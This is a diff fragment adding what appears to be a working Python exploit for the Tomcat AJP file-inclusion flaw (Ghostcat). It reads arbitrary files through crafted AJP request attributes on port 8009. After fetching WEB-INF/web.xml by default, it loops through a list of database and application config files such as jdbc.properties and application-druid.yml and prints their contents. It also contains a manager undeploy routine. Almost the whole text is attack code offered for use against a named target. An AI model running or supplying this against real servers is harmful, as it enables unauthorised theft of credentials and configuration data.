+        headers = {
+            "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded",
+            "SC_REQ_CONTENT_LENGTH": "0",
+            "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host),
+            "Origin": "http://%s" % (self.target_host),
+        }
+        if obj_cookie is not None:
+            headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie')
+
+        attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")},
+                      {"name": "req_attribute",
+                       "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}]
+        if old_version == False:
+            attributes.append({
+                "name": "query_string", "value": "%s&%s" % (path_app, deploy_csrf_token)})
+        r = self.perform_request("/manager/html/undeploy", headers=headers, method="POST", user=user, password=password,
+                                 attributes=attributes)
+        r = AjpResponse.receive(self.stream)
+        if r.prefix_code == AjpResponse.END_RESPONSE:
+            logger.error('Undeploy failed')
+
+        # Check the successful message
+        found = False
+        regex = r'<small><strong>Message:<\/strong><\/small>&nbsp;<\/td>\s*<td class="row-left"><pre>(OK - .*' + path + ')\s*<\/pre><\/td>'
+        while r.prefix_code != AjpResponse.END_RESPONSE:
+            r = AjpResponse.receive(self.stream)
+            if r.prefix_code == 3:
+                f = re.findall(regex, r.data)
+                if len(f) > 0:
+                    found = True
+        if found:
+            logger.info('Undeploy succeed')
+        else:
+            logger.error('Undeploy failed')
+
+
+if __name__ == "__main__":
+
+
+    parser = argparse.ArgumentParser()
+    parser.add_argument('target', type=str, help="Hostname or IP to attack")
+    parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
+    parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
+    args = parser.parse_args()
+    bf = Tomcat(args.target, args.port)
+    attributes = [
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', args.file]},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
+    ]
+    snd_hdrs_res, data_res = bf.perform_request(req_uri='/',method='GET', attributes=attributes)
+    print("".join([d.data for d in data_res]))
+
+    if "WEB-INF" in "".join([d.data for d in data_res]) or "properties" in "".join([d.data for d in data_res]):
+	    print("**********************注意可能有WEB-INF、properties配置文件*************************")
+
+    if "classpath" in "".join([d.data for d in data_res]) :
+	    print("**********************注意可能有classpath的xml文件*************************")
+
+    words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties',
+'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',
+'WEB-INF/classes/spring-websocket-v2.0.xml','WEB-INF/classes/spring-mvc.xml','WEB-INF/classes/log4j.properties']
+
+    for word in words_list:
+
+        print(":::::::::" + word + ":::::::::")
+        attributes = [
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', word]},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
+    ]
+        snd_hdrs_res, data_res = bf.perform_request(req_uri='/',method='GET', attributes=attributes)
+        if "Error report" in "".join([d.data for d in data_res]):
+		    pass
+        else:
+            print("".join([d.data for d in data_res]))
+
+